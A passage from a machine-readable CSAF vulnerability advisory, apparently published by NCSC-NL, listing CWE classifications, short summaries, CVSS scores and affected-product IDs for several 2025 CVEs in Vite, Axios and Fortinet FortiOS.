"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
}
],
"title": "CVE-2025-55018"
},
{
"cve": "CVE-2025-58751",
"cwe": {
"id": "CWE-200",
"name": "Exposure of Sensitive Information to an Unauthorized Actor"
},
"notes": [
{
"category": "other",
"text": "Exposure of Sensitive Information to an Unauthorized Actor",
"title": "CWE-200"
},
{
"category": "other",
"text": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"title": "CWE-22"
},
{
"category": "other",
"text": "Improper Access Control",
"title": "CWE-284"
},
{
"category": "description",
"text": "Certain Vite applications allowed files in the public directory to be served without following `server.fs` settings, particularly when exposed to the network, with specific versions addressing this issue.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-58751 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-58751.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
}
],
"title": "CVE-2025-58751"
},
{
"cve": "CVE-2025-58752",
"cwe": {
"id": "CWE-200",
"name": "Exposure of Sensitive Information to an Unauthorized Actor"
},
"notes": [
{
"category": "other",
"text": "Exposure of Sensitive Information to an Unauthorized Actor",
"title": "CWE-200"
},
{
"category": "other",
"text": "Relative Path Traversal",
"title": "CWE-23"
},
{
"category": "other",
"text": "Improper Access Control",
"title": "CWE-284"
},
{
"category": "description",
"text": "Vite versions prior to 7.1.5, 7.0.7, 6.3.6, and 5.4.20 contained a low-severity vulnerability allowing unauthorized access to HTML files outside configured directories via path traversal when the dev or preview server was exposed and appType was \u0027spa\u0027 or \u0027mpa\u0027.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-58752 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-58752.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
}
],
"title": "CVE-2025-58752"
},
{
"cve": "CVE-2025-58754",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"notes": [
{
"category": "other",
"text": "Allocation of Resources Without Limits or Throttling",
"title": "CWE-770"
},
{
"category": "other",
"text": "CWE-1035",
"title": "CWE-1035"
},
{
"category": "other",
"text": "CWE-937",
"title": "CWE-937"
},
{
"category": "description",
"text": "Axios is vulnerable to denial of service attacks due to unbounded memory allocation for `data:` URIs in versions prior to 0.30.2 and 1.12.0, with additional security issues noted in HPE and Oracle products.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-58754 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-58754.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
}
],
"title": "CVE-2025-58754"
},
{
"cve": "CVE-2025-62439",
"cwe": {
"id": "CWE-940",
"name": "Improper Verification of Source of a Communication Channel"
},
"notes": [
{
"category": "other",
"text": "Improper Verification of Source of a Communication Channel",
"title": "CWE-940"
},
{
"category": "description",
"text": "A vulnerability in Fortinet FortiOS versions 7.0 through 7.6.4, specifically in the FSSO Terminal Services Agent, allows an authenticated user with knowledge of FSSO policy configurations to gain unauthorized access to protected network resources via crafted requests due to improper verification of the communication channel source.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-62439 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-62439.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.2,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
}
],
"title": "CVE-2025-62439"
},
{
"cve": "CVE-2025-62522",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"notes": [
{
"category": "other",
"text": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"title": "CWE-22"
},
{
"category": "other",
"text": "CWE-1035",
"title": "CWE-1035"
},
{
"category": "other",
"text": "CWE-937",
"title": "CWE-937"
},
{
"category": "description",
"text": "Vite versions from 2.9.18 to 7.1.11 had a vulnerability on Windows allowing access to files denied by `server.fs.deny` if the URL ended with `\\\\`, which has been patched in later releases.",
"title": "Summary"
},
{
"category": "general",
